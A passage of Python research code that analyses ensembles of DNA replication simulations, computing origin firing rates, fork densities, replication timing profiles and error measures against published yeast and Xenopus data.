self.aDNAs.append([])
self.raDNAs.append([])
self.aUnrs.append([])
self.aFree_Diff.append([])
self.aFree_origins.append([])
self.aFree_Diff_bis.append([])
self.aFiring_Position.append([])
self.aIODs.append([])
self.aIRTDs.append([])
self.aTLs.append([])
self.aPol.append([])
self.fork_speeds.append([])
self.lft_forks.append([])
for poly in S.polys:
if orip:
p = poly.get_ori_position()
p.sort()
self.orip.append(p)
print(p)
dt = self.dte
# Cut == 0 because we removed them from all the chromosomes
ft, it = poly.get_firing_time_It(cut=0, normed=False, dt=dt)
fd = poly.get_fork_density(cut=0, normed=False, dt=dt) # Normed afteward
self.aIts[-1].append(it)
self.aFts[-1].append(ft)
self.aFds[-1].append(fd)
dnat, _, pol = poly.get_DNA_with_time(dt=dt, polarity=True)
self.raDNAs[-1].append(dnat)
self.aPol[-1].append(pol)
if correlation:
iods, irtds, tls = poly.get_correlations(dt=dt, thresh=0.99)
self.aIODs[-1].append(iods)
self.aIRTDs[-1].append(irtds)
self.aTLs[-1].append(tls)
fsp, lft = poly.get_speeds_lifetime()
self.fork_speeds[-1].extend(fsp)
self.lft_forks[-1].extend(lft)
# if hasattr(poly, "fork_speeds"):
# self.fork_speeds[-1].extend(poly.fork_speeds)
"""
All the following line to be able to compute No(t-1)
"""
# print(self.aUnrs[-1][-1])
# .append(poly.get_DNA_with_time(fork_speed=self.fork_speed)[0])
# print(self.raDNAs[-1][-1][-1])
Free_o = poly.get_free_origins_time(normed=False, dt=dt).tolist()
assert (Free_o[-1] == 0)
self.aFree_origins[-1].append(np.array([len(poly.origins)] + Free_o[:-1]))
# self.aFree_origins[-1].append(Free_o)
# print(self.aFree_origins[-1])
# assert(1 == 0)
"""
len_poly = poly.end + 1 - poly.start
assert(self.raDNAs[-1][-1][-1] == len_poly)
self.raDNAs[-1][-1] = self.raDNAs[-1][-1].tolist()
self.raDNAs[-1][-1].pop(0)
self.raDNAs[-1][-1].append(len_poly)
self.raDNAs[-1][-1] = np.array(self.raDNAs[-1][-1])
# print(self.raDNAs[-1][-1])
# self.aUnrs[-1][-1] = self.aUnrs[-1][-1]
"""
len_poly = poly.end + 1 - poly.start
self.aUnrs[-1].append(len_poly - self.raDNAs[-1][-1])
ftime, firing_position = poly.get_dist_between_activated_origins(dt=dt)
self.aFiring_Position[-1].append(firing_position)
# print (norm.shape,self.aUnrs[-1][-1].shape)
# raise
# print(it)
DNA_time = np.sum(np.array(self.raDNAs[-1]), axis=0) / np.sum(self.lengths)
try:
for t in range(len(DNA_time)):
tp = int(round(t * dt / self.dt_speed, 0))
if tp > len(S.Ndiff_libre_t) - 1:
break
self.aFree_Diff_bis[-1].append(S.Ndiff_libre_t[tp])
except:
# Not available in 3D
pass
"""
try:
self.aFree_Diff[-1] = S.get_free()
# print(self.aFree_Diff[-1])
except:
pass"""
bins = 100
for poly in S.polys:
self.aIfs[-1].append(poly.get_firing_at_fraction(DNA_time=DNA_time,
cut=0, bins=bins))
self.aIfs[-1] = np.sum(np.array(self.aIfs[-1]), axis=0) / \
(np.array(np.arange(0, 1, 1 / bins) + 1 / 100.) * self.length)[::-1]
# print (np.array(np.arange(0,1,1/bins) * np.sum(self.lengths))[::-1])
unr = np.sum(np.array(self.aUnrs[-1]), axis=0)
unr[unr == 0] = np.nan
self.anIts[-1] = np.sum(np.array(self.aIts[-1]), axis=0)
self.aIts[-1] = np.sum(np.array(self.aIts[-1]), axis=0) / unr
self.aFds[-1] = np.sum(np.array(self.aFds[-1]), axis=0) / self.length
self.aFree_origins[-1] = np.sum(np.array(self.aFree_origins[-1]), axis=0)
# print(self.raDNAs)
self.aDNAs[-1] = 1 + np.sum(np.array(self.raDNAs[-1]), axis=0) / self.length
return S
def get_what(self, what, fraction=[0, 1], max_track_length=None):
"""return an array which contain a concatenation by sim
for each sim it is an array which contain a list of the given quantity for evey time step
IOD, IRTD, or TL
"""
def recompute(what, tl, max_track_length):
res = []
for ich, ch in enumerate(what):
res.append([])
for ipos, spos in enumerate(ch):
# Go throug time
# print(spos)
# print(spos,)
if type(spos) is not list:
spos = [] + spos.tolist()
else:
spos = [] + spos
if spos == []:
res[-1].append([])
continue
spos.insert(0, 0)
pos = np.cumsum(spos)
# print(tl[ich][ipos])
keep = np.array(tl[ich][ipos]) < max_track_length
kpos = pos[np.array(keep, np.bool)]
pos = kpos[1:] - kpos[:-1]
res[-1].append(pos)
"""
if np.any(keep == False):
print(pos.shape, keep.shape, pos[keep].shape)
print(len(res[-1][-1]), len(ch[ipos]))
# print(spos, pos, keep, tl[ich][ipos])
print(res[-1][-1])
raise"""
# return
return np.array(res).T
iod3 = []
for sim in range(self.Nsim):
def get_by_time(what=what):
# print(sim)
iods = np.array(getattr(self, "a" + what + "s")[sim])
if max_track_length is not None:
tl = np.array(getattr(self, "aTLs")[sim])
tl = tl.T
iods = iods.T
iods2 = []
fraction_time = np.array(self.raDNAs[sim]).copy()
for ichl, chl in enumerate(self.lengths):
# Normalise to 1 by dividing by chromosome length
fraction_time[ichl] /= chl
to_keep = iods
if max_track_length is not None:
# print(tl[ich].shape)
to_keep = recompute(iods.T, tl.T, max_track_length)
# print(fraction_time.shape)
for ich, (ch_what, ch_fraction) in enumerate(zip(to_keep, fraction_time.T)):
# We go throug time and
# By chromosomes select where they match the selected fraction:
select = (ch_fraction >= fraction[0]) * (ch_fraction <= fraction[1])
# print(select)
# return
if np.sum(select) >= 2:
iods2.append(np.concatenate(ch_what[select]))
if np.sum(select) == 1:
# print(ch_what)
iods2.append(np.array(ch_what[select][0]))
"""
print(iods2[-1])
print(iods2[-2])
print(np.concatenate([[], []]).shape)
print(np.array([]).shape)
return"""
if np.sum(select) == 0:
iods2.append(np.array([]))
return iods2
iod3 += get_by_time()
return iod3
def get_cum_sum_hist(self, what, bins=100, fraction=[0, 1], max_track_length=None):
"""Cumulative histogram in a combing like fashion
as the time steps are all used and added together"""
if what != "ori":
data = self.get_what(what, fraction=fraction, max_track_length=max_track_length)
elif what == "ori":
data = [np.array(io)[1:] - np.array(io)[:-1] for io in self.l_ori]
m = []
for i in data:
m += i.tolist() # np.mean(i) for i in iod3 if i != [] ]
self.m = m
y, x = np.histogram(m, bins=bins, normed=True)
# hist(m,bins=100,normed=True,cumulative=-1,histtype='step')
y = np.array([0] + np.cumsum(y).tolist())
y /= y[-1]
# print(y[0], y[-1])
y = 1 - y
# plot( 5*(x[1:]/2+x[:-1]/2),y)
return x, y
def get_quant(self, name, shift=0, n_rep=None, cut=0):
if shift != 0:
print("You should not use it")
prop = getattr(self, name)
# print(prop)
times = self.get_times_replication(n_rep=n_rep)
# print(times)
# print(maxl)
if -1 in times:
maxl = int(max(map(len, prop)))
else:
maxl = int(max(times / self.dte))
if name == "aIfs":
maxl = len(prop[0])
normed_prop = np.zeros((len(prop[:n_rep]), maxl))
# print("Nan")
normed_prop += np.nan
for iIt, It in enumerate(prop[:n_rep]):
# print(len(It), maxl)
normed_prop[iIt, :min(len(It), maxl)] = np.array(It[:min(len(It), maxl)])
if cut != 0 and name in ["anIts", "aFds"]:
# Remove last cut:
# print("Before", normed_prop[iIt])
# print("la")
removed = 0
if cut != 0:
for i in range(1, len(normed_prop[iIt])):
while removed != cut and normed_prop[iIt][-i] > 0:
# print(i)
normed_prop[iIt][-i] = -1
removed += 1
if removed == cut:
normed_prop[iIt][-i:] = np.nan
break
# print("After", normed_prop[iIt])
if shift != 0:
normed_prop[iIt, len(It):] = It[-1]
self.all = normed_prop
x = np.arange(maxl)
if n_rep:
y = np.nanmean(normed_prop[:n_rep], axis=0)
err = np.std(normed_prop[:n_rep], axis=0)
else:
y = np.nanmean(normed_prop, axis=0)
err = np.std(normed_prop, axis=0)
return x * self.dte, y, err, normed_prop
def get_time(self, n_rep=None):
times = self.get_times_replication(n_rep=n_rep)
# print(times)
# print(maxl)
maxl = int(max(times / self.dte))
return np.arange(maxl) * self.dte
def get_times_replication(self, finished=True, n_rep=None):
v = self.try_load_property("get_times_replication")
if v is not None:
return v
times = []
for rep in self.aRps[:n_rep]:
times.append(-1)
for c in rep:
if finished and np.sum(np.equal(c, None)) != 0:
times[-1] = -1
break
else:
times[-1] = max(times[-1], max(np.array(c)[~np.equal(c, None)]))
# print(self.dte)
return np.array(times) # * self.dte
@property
def nori(self):
nori = 1.0 * np.sum(list(map(len, self.l_ori)))
if nori == 0:
print("Warning, no origins ")
return nori
@property
def length(self):
return np.sum(self.lengths)
@property
def dte(self):
if self.one_minute:
return 1
else:
return self.dt_speed
def try_load_property(self, name):
# print(name)
if hasattr(self, "hdf5_file") and self.hdf5_file is not None:
with h5py.File(self.hdf5_file, 'r') as myfile:
quant = myfile.get("analysis")
if quant is not None:
prop = quant.get(name)
# print(prop, hasattr(prop, "shape"))
if hasattr(prop, "shape"):
return prop.value
# print(prop, dir(prop))
if prop is not None:
return [prop[str(i)].value for i in range(len(prop))]
return None
def get_dist_between_activated_origins(self, time=None):
"""Time in minutes"""
v = self.try_load_property("get_dist_between_activated_origins")
if v is not None:
return v
Dist = []
if time is None:
time = 1e8
else:
time = time # / self.dte
# print(time)
for fps in self.aFiring_Position:
for fp in fps:
fired = fp[::, 0] <= time
dist = fp[fired][::, 1]
dist = dist[1:] - dist[:-1]
Dist.extend(dist)
return Dist
def get_time_at_fraction(self, frac=1, bead=True):
dna = frac + 1
x, DNA = self.DNAs()[:2]
# print(DNA)
for iid, d in enumerate(DNA):
if d >= dna:
return x[iid]
return x[-1]
def Mean_replication_time(self, n_intervals=6):
v = self.try_load_property("Mean_replication_time")
if v is not None:
return v
def get_times_at_fraction(nsim, time, n_interval=6):
fracs = np.arange(0, 1.01, 1 / n_interval)
idna = 0
dna = fracs[idna] + 1
DNA = self.aDNAs[nsim]
times = []
# print(DNA)
for iid, d in enumerate(DNA):
if d >= dna:
# print(dna)
times.append(time[iid])
idna += 1
dna = fracs[idna] + 1
if dna >= 2:
times.append(time[-1])
break
return times
rep = []
cp = []
time = self.get_time()
#time, _, _, _ = self.get_quant("aDNAs")
for il, l in enumerate(self.lengths):
rep.append(np.zeros((n_intervals, l)))
Nsim = len(self.aRps)
for sim in range(Nsim):
intervals = get_times_at_fraction(sim, time)
#print("int", intervals, len(time))
# print(self.aRps[sim][il])
for iinte, (end, start) in enumerate(zip(intervals[1:], intervals[:-1])):
pos = (self.aRps[sim][il] <
end) & (self.aRps[sim][il] > start)
# print(pos)
rep[-1][iinte, pos] += 1
cp.append(copy.deepcopy(rep[-1]))
cp[-1] = cp[-1] / np.sum(cp[-1], axis=0)
tmp = np.zeros_like(cp[-1])
for i in range(1, n_intervals + 1):
tmp[i - 1, ::] = i
toc = cp[-1] * tmp * 6 / 5 - 1 / 5 # rescale the interval index to a fraction; hard-coded for n_intervals == 6
mcp = np.mean(toc, axis=0)
std = np.mean((toc - mcp)**2, axis=0)**0.5
cp[-1] = [mcp, std]
return rep, cp
def It_Mean_field_origins(self, n_rep=None):
v = self.try_load_property("It_Mean_field_origins")
if v is not None:
return v
x, y = self.Free_Diff_bis(n_rep=n_rep)[:2]
x, y1 = self.Free_origins(n_rep=n_rep)[:2]
x, DNA = self.DNAs(n_rep=n_rep)[:2]
Unr = (2 - DNA) * self.length
return x, y * y1 / Unr * self.p_on * self.p_v / self.dt_speed
def It_Mean_field_simplified(self, n_rep=None):
v = self.try_load_property("It_Mean_field_simplified")
if v is not None:
return v
x, y = self.Free_Diff_bis(n_rep=n_rep)[:2]
# print(self.nori, self.length)
return x, y * self.nori / self.length * self.p_on * self.p_v / self.dt_speed
def get_rep_profile(self, allp=True):
v = self.try_load_property("get_rep_profile")
if v is not None:
return v
rep = []
repall = []
for il, l in enumerate(self.lengths):
rep.append(np.zeros(l))
repall.append([])
Nsim = len(self.aRps)
for sim in range(Nsim):
rep[il] += np.array(self.aRps[sim][il]) / Nsim
repall[-1].append(np.array(self.aRps[sim][il]))
if allp:
return rep, repall
return rep
def get_mean_copie(self, time):
copie = []
std_copie = []
rep_t = self.get_times_replication()
for il, l in enumerate(self.lengths):
# print(l)
Nsim = len(self.aRps) - rep_t.tolist().count(-1)
copie.append(np.ones((Nsim, l)))
for sim, time_rep in enumerate(rep_t):
if time_rep != -1:
# print("th")
copie[il][sim, np.array(self.aRps[sim][il] * self.dte) < time] = 2
sim += 1
std_copie.append(np.std(copie[il], axis=0))
copie[il] = np.mean(copie[il], axis=0)
return copie, std_copie
def Its(self, n_rep=None, recompute=False, cut=0):
v = self.try_load_property("Its")
if v is not None:
# print("Pre")
return v
if cut != 0 and recompute is False:
print("Warning Its does not consider cut")
elif cut != 0 and recompute is True:
print("Cut Its considered")
if recompute:
NF = self.get_quant("anIts", n_rep=n_rep, cut=cut)[3]
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x, _, _, Unr = self.get_quant("tUNrs", n_rep=n_rep)
Unr[Unr == 0] = np.nan
y = np.nanmean(NF / Unr, axis=0)
# Unr[Unr == 0] = 1
return x, y, np.mean(NF, axis=0), np.nanmean(NF, axis=0) / np.nanmean(Unr, axis=0)
else:
x, y, std, alls = self.get_quant("aIts", n_rep=n_rep)
# As this are cumulative properties, this scale for one minute
return x, y / self.dte, std, alls
def Ifs(self, n_rep=None, recompute=False, cut=0):
if recompute:
print("Sorry, the recompute variant is not implemented for Ifs")
return
if cut != 0 and not recompute:
print("Warning Ifs does not consider cut")
elif cut != 0 and recompute:
print("Cut Ifs considered")
if recompute:
self.get_quant("anIts", n_rep=n_rep)
Nori = self.all + 0
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x = self.get_quant("tUNrs", n_rep=n_rep)[0]
Unr = self.all + 0
meanurn = np.mean(Unr, axis=0)
Unr[Unr == 0] = np.nan
y = np.nanmean(Nori / Unr, axis=0)
Unr[np.isnan(Unr)] = 0
# Unr[Unr == 0] = 1
return x, y, np.mean(Nori, axis=0), meanurn, Unr
else:
return self.get_quant("aIfs", n_rep=n_rep)
def nIts(self, n_rep=None):
return self.get_quant("anIts", n_rep=n_rep)
def MeanIts(self, n_rep=None, cut=0):
v = self.try_load_property("MeanIts")
if v is not None:
return v
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x, Nf, std, alls = self.get_quant("anIts", n_rep=n_rep, cut=cut)
x, Unr, std, allsu = self.get_quant("tUNrs", n_rep=n_rep)
# allsu[allsu == 0] = np.nan
print(np.nansum(alls[np.isnan(allsu)]))
# alls[np.isnan(allsu)] = np.nan
allsu[np.isnan(allsu)] = 0
alls[np.isnan(alls)] = 0
return x, Nf / Unr / self.dt_speed, np.nanmean(alls / allsu, axis=0) / self.dt_speed, np.nanmean(alls, axis=0) / np.nanmean(allsu, axis=0) / self.dt_speed
def passi(self):
v = self.try_load_property("passi")
if v is not None:
return v
x, Nori_libre = self.Free_origins()[:2]
ori_loss = Nori_libre[:-1] - Nori_libre[1:]
# plot(x[:-1],ori_loss)
x, activated = self.nIts()[:2]
# plot(x,activated,label="Activated")
passivated = ori_loss - activated[:-1]
return x[:-1], passivated
def Pol(self):
v = self.try_load_property("Pol")
if v is not None:
return v
rep = []
repall = []
for il, l in enumerate(self.lengths):
rep.append(np.zeros(l))
repall.append([])
Nsim = len(self.aPol)
for sim in range(Nsim):
rep[il] += np.array(self.aPol[sim][il]) / Nsim
return rep
def acti(self):
v = self.try_load_property("acti")
if v is not None:
return v
x, Nori_libre = self.Free_origins()[:2]
x, activated = self.nIts()[:2]
# plot(x,activated,label="Activated")
# plot(x[:-1],passivated,label="passivated")
# legend()
# figure()
return x[:-1], activated[:-1]
def passi_acti(self):
v = self.try_load_property("passi_acti")
if v is not None:
return v
x, Nori_libre = self.Free_origins()[:2]
ori_loss = Nori_libre[:-1] - Nori_libre[1:]
# plot(x[:-1],ori_loss)
x, activated = self.nIts()[:2]
# plot(x,activated,label="Activated")
passivated = ori_loss - activated[:-1]
# plot(x[:-1],passivated,label="passivated")
# legend()
# figure()
return x[:-1], passivated / activated[:-1]
def ItsDifferentWay(self, cut=0):
pass
def Fds(self, n_rep=None):
v = self.try_load_property("Fds")
if v is not None:
return v
return self.get_quant("aFds", n_rep=n_rep)
def Free_Diff(self, n_rep=None):
v = self.try_load_property("Free_Diff")
if v is not None:
return v
return self.get_quant("aFree_Diff", n_rep=n_rep)
def rho_ori(self, n_rep=None):
v = self.try_load_property("rho_ori")
if v is not None:
return v
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x, _, _, Unr = self.get_quant("tUNrs", n_rep=n_rep)
Unr[Unr == 0] = np.nan
x, _, _, Nori_libre = self.Free_origins()
return x, np.nanmean(Nori_libre / Unr, axis=0)
def Rps(self, n_rep=None):
return self.get_quant("aRps", n_rep=n_rep)
def DNAs(self, n_rep=None):
v = self.try_load_property("DNAs")
if v is not None:
return v
return self.get_quant("aDNAs", n_rep=n_rep)
def Free_origins(self, n_rep=None):
return self.get_quant("aFree_origins", n_rep=n_rep)
def Free_Diff_bis(self, n_rep=None):
v = self.try_load_property("Free_Diff_bis")
if v is not None:
return v
return self.get_quant("aFree_Diff_bis", n_rep=n_rep)
def n_activated_oris(self):
return list(map(len, np.concatenate(self.aFts)))
def error_DNA_time(self, plot=False, shift=0):
# https://academic.oup.com/nar/article/42/1/e3/2437422/The-dynamics-of-genome-replication-using-deep
point = [(4.3714285714285808, 1.0420168067226889), (9.2571428571428562, 1.0126050420168067), (14.40000000000002, 1.0714285714285714), (17.228571428571435, 1.0420168067226889), (19.800000000000015, 0.97058823529411764), (24.428571428571431, 0.96218487394957974), (30.085714285714289, 0.97478991596638642), (32.657142857142873, 1.0714285714285714), (34.71428571428573, 1.1596638655462184), (37.028571428571425, 1.2983193277310923),
(39.85714285714284, 1.3277310924369747), (42.428571428571445, 1.3067226890756303), (44.48571428571428, 1.5462184873949578), (46.800000000000026, 1.588235294117647), (49.371428571428581, 1.6470588235294117), (54.771428571428551, 1.672268907563025), (59.914285714285718, 1.8613445378151261), (69.942857142857122, 1.9957983193277311), (79.971428571428589, 1.9495798319327733), (89.742857142857147, 1.8781512605042017)]
# x_exp,y_exp = zip(*point)
x, y, std, alls = self.DNAs()
error = 0
Np = 0
for xe, ye in point:
if xe >= shift:
i = np.argmin((x - xe + shift)**2)
# print(x[i],xe)
error += (ye - y[i])**2
Np += 1
if plot:
return zip(*point)
return error, Np
def error_FD_time(self, plot=False, shift=0):
point = [(250, 0.025), (500, 0.1), (1000, 0.2), (1250, 0.13),
(1500, 0.09), (2000, 0.01)] # Goldar 2008 (/kb)
point = [(time / 60, value) for time, value in point]
x, y = self.Fds()[: 2]
error = 0
Np = 0
for xe, ye in point:
if xe >= shift:
i = np.argmin((x - xe + shift)**2)
# print(x[i],xe)
error += (ye - y[i])**2
Np += 1
if plot:
return zip(*point)
return error, Np
def error_firing_time(self, plot=False, specie="yeast", coarse=1, arach=False, smooth=1):
# Universal Temporal Profile of Replication Origin (Goldar)
if specie not in ["yeast", "xenope"]:
raise ValueError("specie must be 'yeast' or 'xenope'")
point = [(5, 0.01), (13, 0.02), (16, 0.04), (20, 0.07), (25, 0.02),
(30, 0.01)] + [(i, 0) for i in range(31, 70, 2)] # xenopus default
unity = 1 # we want it by minutes
point = [(time, value * unity) for time, value in point]
if specie == "yeast":
point = [11.104005791505799, 0.00018581081081081065,
12.066008316008308, 0.00020270270270270323,
13.165837540837543, 0.00023648648648648667,
13.990477427977439, 0.0002533783783783784,
15.0921629046629, 0.0003547297297297296,
16.05787793287793, 0.0005067567567567568,
17.161883724383713, 0.0006925675675675674,
18.127134689634687, 0.0008277027027027029,
19.092849717849717, 0.0009797297297297301,
20.19592738342739, 0.0011317567567567573,
21.159786159786165, 0.001216216216216216,
22.1227168102168, 0.001266891891891892,
23.22393822393822, 0.0013513513513513514,
24.191509504009503, 0.001570945945945946,
25.298763736263723, 0.001875,
26.407410157410155, 0.0022297297297297295,
27.233442233442233, 0.0022972972972972973,
28.46970596970597, 0.0022972972972972973,
29.431244431244423, 0.0022972972972972973,
30.402528215028198, 0.0026520270270270273,
31.514887139887136, 0.0031418918918918915,
32.35437704187704, 0.003699324324324324,
33.59156890406891, 0.003733108108108108,
34.55125111375111, 0.0036655405405405404,
35.50907707157708, 0.003530405405405405,
36.614475051975035, 0.0037668918918918916,
37.723121473121466, 0.004121621621621621,
38.69208494208493, 0.004391891891891891,
39.65640778140778, 0.004493243243243243,
40.747419809919805, 0.004206081081081081,
41.696892634392626, 0.0037668918918918916,
42.666320166320176, 0.004054054054054054,
43.775894713394706, 0.004442567567567567,
44.73279254529254, 0.004273648648648648,
45.82380457380458, 0.003986486486486486,
46.62338506088507, 0.003091216216216216,
47.83180501930502, 0.0020777027027027027,
48.78591847341846, 0.0018074324324324326,
49.72425378675379, 0.0009628378378378375,
50.65934065934067, 0,
51.75824175824175, 0,
52.85760692010692, 0.000016891891891892587,
53.81914538164537, 0.000016891891891892587,
54.780219780219795, 0,
56.15384615384616, 0,
57.11538461538461, 0,
57.93956043956044, 0]
point = np.array(point)
point = point.reshape(-1, 2)
if arach:
if specie == "yeast":
print(point.shape)
point = pd.read_csv("../../data/external/I2T_yeast.txt", sep=" ", header=None)
point[0] += 10
point = np.array(point)
print(point.shape)
if specie == "xenope":
A = pd.read_csv("../../data/external/I2T_exenope.txt", sep=" ", header=None)
A[0] = (A[0] - 20 * 60) / 60
A[1] = pd.rolling_mean(A[1], window=smooth) * 10
point = np.array(A)
x, y = self.Its()[: 2]
error = 0
Np = 0
shift = 0
for xe, ye in point:
if xe >= shift:
i = np.argmin((x - xe + shift)**2)
# print(x[i],xe)
error += (ye - y[i] / coarse)**2
Np += 1
if plot:
return zip(*point)
return error, Np
def xenope_prof(self, profile=True, which="mean", toplot=True, hour=False, kb=1, color=None, std=False):
import matplotlib.pyplot as plt
chro = 0
coarse = 1000
if profile:
if which == "mean":
Prof, allP = self.get_rep_profile(allp=True)
Prof = Prof[0]
allP = allP[0]
x = np.arange(len(Prof)) * coarse / 1000.
h = 1
if hour:
h = 1 / 60.
y = Prof * h
if toplot:
kwargs = {"label": "Simulated"}
if color is not None:
kwargs["color"] = color
if std:
#print(np.array(allP).shape, Prof.shape)
#print((np.mean((np.array(allP) - Prof)**2, axis=0)**0.5) * h)
plt.errorbar(x * kb, Prof * h,
(np.mean((np.array(allP) - Prof)**2, axis=0)**0.5) * h, errorevery=200, **kwargs)
plt.xlim(-10 * kb, (x[-1] + 10) * kb)
else:
plt.plot(x * kb, Prof * h, **kwargs)
plt.xlim(-10 * kb, (x[-1] + 10) * kb)
else:
for sim in which:
x = np.arange(len(self.aRps[sim][chro])) * coarse / 1000.
plt.plot(x, self.aRps[sim][chro])
top = self.aRps[sim][chro]
plt.xlim(-10, x[-1] + 10)
else:
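            # NOTE: this branch reads times and mean_copie, which are not defined
            # in this method (they are built in whole_genome_timing below)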
k = list(times.keys())
k.sort()
for ikk, kk in enumerate(k):
if ikk == 0:
mean_C = mean_copie[kk][chro]
else:
mean_C += mean_copie[kk][chro]
x = np.arange(len(mean_C)) * coarse / 1000.
plt.plot(np.arange(len(mean_C)) * coarse / 1000., mean_C / len(k))
plt.xlim(-10, x[-1] + 10)
return x, y
def whole_genome_timing(self, coarse=5000, figsize=(12, 12), plot=True,
default_rep="../../data/external/time-coordinate.pick",
experiment=True, profile=False, which="mean", fig=None,
warning=True, ori=True, shift=0, N_chrom=range(16), strength_ori=None,
centro=False):
import matplotlib.pyplot as plt
with open(default_rep, "rb") as f:
times, coordinate = cPickle.load(f)
time_p = list(times.keys())
time_p.sort()
dna = []
for t in time_p:
dna.append(np.concatenate(times[t]).mean())
# plot(time_p, dna)
result = {"chr": [], "start": [], "end": [], "mean_copie_exp": [], "mean_copie_simu": []}
# f = figure(figsize=(20,20))
if fig is None:
f = plt.figure(figsize=figsize)
elif fig == "other":
pass
else:
f = fig
mean_copie = {}
if not profile:
k = list(times.keys())
k.sort()
for ikk, kk in enumerate(k):
mean_copie[kk] = self.get_mean_copie(max(0, int(kk) - shift))[0]
# print(mean_copie[kk],len(mean_copie[kk][0]) )
# print(len( mean_copie[kk]))
if profile:
max_t = self.get_times_replication()
max_t = self.get_rep_profile(allp=False)
if which == "mean":
max_t = np.max(list(map(max, max_t)))
else:
max_t = max(np.array(max_t)[which])
if max_t == -1:
max_t = np.max(self.get_times_replication(finished=False))
extra = [0, 0, 0, 1, 2, 2, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6]
position = [0, 1, 2, 0, 0, 1, 2, 0, 1, 2, 0, 1, 0, 1, 0, 1]
sS = 0.03
sh = 0.04
height = 1 / (7 + 1) - sh
margin_right = 0.02
for chro in N_chrom:
# ax = f.add_subplot(4,4,chro + 1)
# ax = f.add_subplot(gs[chro])
# print([xstart,ystart,w,h])
if fig != "other":
column = extra[chro]
tot = extra.count(column)
p = position[chro]
row_lengths = [l for l, i in zip(self.lengths, extra) if column == i]
crow_length = [0] + np.cumsum(row_lengths).tolist()
xstart = (p + 1) * sS + (1 - margin_right - tot * sS) * \
crow_length[p] / (sum(row_lengths))
ystart = 1 - (column + 1) * (height + sh)
w = (1 - margin_right - tot * sS) * row_lengths[p] / (sum(row_lengths))
h = height
f.add_axes([xstart, ystart, w, h])
# print(chro, w, h, (1 - margin_right - tot * sS))
# chro = 3
if profile:
if which == "mean":
Prof = self.get_rep_profile(allp=False)[chro]
x = np.arange(len(Prof)) * coarse / 1000.
# print(Prof)
plt.plot(x, Prof * self.dte, label="Simulated")
plt.xlim(-10, x[-1] + 10)
top = Prof * self.dte
else:
for sim in which:
x = np.arange(len(self.aRps[sim][chro])) * coarse / 1000.
plt.plot(x, self.aRps[sim][chro] * self.dte)
top = self.aRps[sim][chro]
plt.xlim(-10, x[-1] + 10)
else:
k = list(times.keys())
k.sort()
for ikk, kk in enumerate(k):
if ikk == 0:
mean_C = mean_copie[kk][chro]
else:
mean_C += mean_copie[kk][chro]
x = np.arange(len(mean_C)) * coarse / 1000.
plt.plot(np.arange(len(mean_C)) * coarse / 1000., mean_C / len(k))
plt.xlim(-10, x[-1] + 10)
top = mean_C / len(k)
if ori:
if strength_ori is not None:
st = strength_ori[chro]
else:
st = [1] * len(self.l_ori[chro])
pos = self.l_ori[chro]
                if self.positions is not None:
pos = self.positions[chro]
for x, s in zip(pos, st):
# print(np.array(top)[~np.equal(top, None)])
mini = min(np.array(top)[~np.equal(top, None)])
maxi = max(np.array(top)[~np.equal(top, None)])
#mini = 1
#maxi = 2
# print(mini, maxi)
col = "k"
if s != 1:
col = {"Confirmed": "r", "Likely": "g", "Dubious": "b"}[s]
plt.plot([x * coarse / 1000., x * coarse / 1000],
[mini, maxi], "--", color=col, linewidth=1)
def get_rep_prof(times, coordinate, ch, profile=True):
k = list(times.keys())
k.sort()
# To get all the coordinates
m = []
for kk in k:
m = list(set(coordinate[kk][ch] + m))
m.sort()
# print(len(m))
rep = np.zeros(len(m)) # + 70
norm = np.zeros(len(m))
for ilocus, locus in enumerate(m):
# print(locus)
for kk in k[:: -1]:
if locus in coordinate[kk][ch]:
i = list(coordinate[kk][ch]).index(locus)
if profile:
if times[kk][ch][i] > 1.5:
rep[ilocus] = min(int(kk), 70)
else:
# Mean replication value
rep[ilocus] += times[kk][ch][i]
norm[ilocus] += 1
norm[norm == 0] = 1
if profile:
rep[rep == 0] = 70
# print(times[kk][ch])
return m, rep / norm
if experiment:
locci, p = get_rep_prof(times, coordinate, chro, profile=profile)
# m = lengths[chro] / len(p)
# plot(np.arange(len(p)) * m,p)
if not profile:
for loc, copie in zip(locci, p):
result["chr"].append(chro + 1)
result["start"].append(loc)
result["end"].append(loc)
result["mean_copie_exp"].append(copie)
try:
result["mean_copie_simu"].append(top[int(loc / coarse)])
except IndexError:
if warning:
print("out of bounds")
result["mean_copie_simu"].append(top[-1])
if not profile:
plt.plot(np.array(locci) / 1000., p, "-", label="simulated")
if profile:
prof = pd.read_csv(
"../../../ifromprof/notebooks/exploratory/Yeast_wt_alvino.csv")
plt.plot(prof[prof.chr == chro + 1]["coordinate (kb)"],
prof[prof.chr == chro + 1].TrepA, label="Experimental")
if centro:
lc = "../../data/external/saccharomyces_cerevisiae_R64-2-1_20150113.gff"
lengths, centrom = load_lengths_and_centro(lc, 1000, verbose=False)
# print(centrom)
plt.plot([centrom[chro], centrom[chro]], [0, max_t])
if profile:
plt.ylim(max_t, 0)
else:
plt.ylim(1., 2.)
if extra[chro] == 6:
plt.xlabel("Genomic position (kb)")
if position[chro] == 0:
if profile:
plt.ylabel("rep time (min)")
else:
plt.ylabel("gene copy number")
class ensembleSimAnalysis(ensembleSim):
def __init__(self, json_file, hdf5_file, Nsim=None):
with open(json_file, "r") as f:
self.parameters = json.load(f)
sub_sample_ori = self.parameters.get("sub_sample_ori", None)
if sub_sample_ori:
self.parameters.pop("sub_sample_ori")
if "lengths" in self.parameters:
l_ori = [list(range(int(self.parameters["lengths"][0] * sub_sample_ori)))]
lengths = self.parameters["lengths"]
else:
l_ori = [list(range(int(self.parameters["len_chrom"][0] * sub_sample_ori)))]
lengths = self.parameters["len_chrom"]
else:
extra = "../../"
if type(self.parameters["lengths"]) == str:
lengths, _ = load_lengths_and_centro(
extra + self.parameters["lengths"], self.parameters["coarse"])
self.parameters["lengths"] = lengths
if type(self.parameters["Nori"]) == str and self.parameters["Nori"] != "xenope":
d = {"C": "Confirmed", "L": "Likely", "D": "Dubious"}
ot = []
for o in self.parameters["ori_type"]:
ot.append(d[o])
l_ori = load_ori_position(extra + self.parameters["Nori"],
ot,
self.parameters["lengths"],
self.parameters["coarse"], coarsed=self.parameters["coarsed"])
if Nsim is None:
Nsim = self.parameters["Nsim"]
if "Ndiff" in self.parameters:
Ndiff = self.parameters["Ndiff"]
else:
Ndiff = self.parameters["N_diffu"]
if "p_on" in self.parameters:
p_on = self.parameters["p_on"]
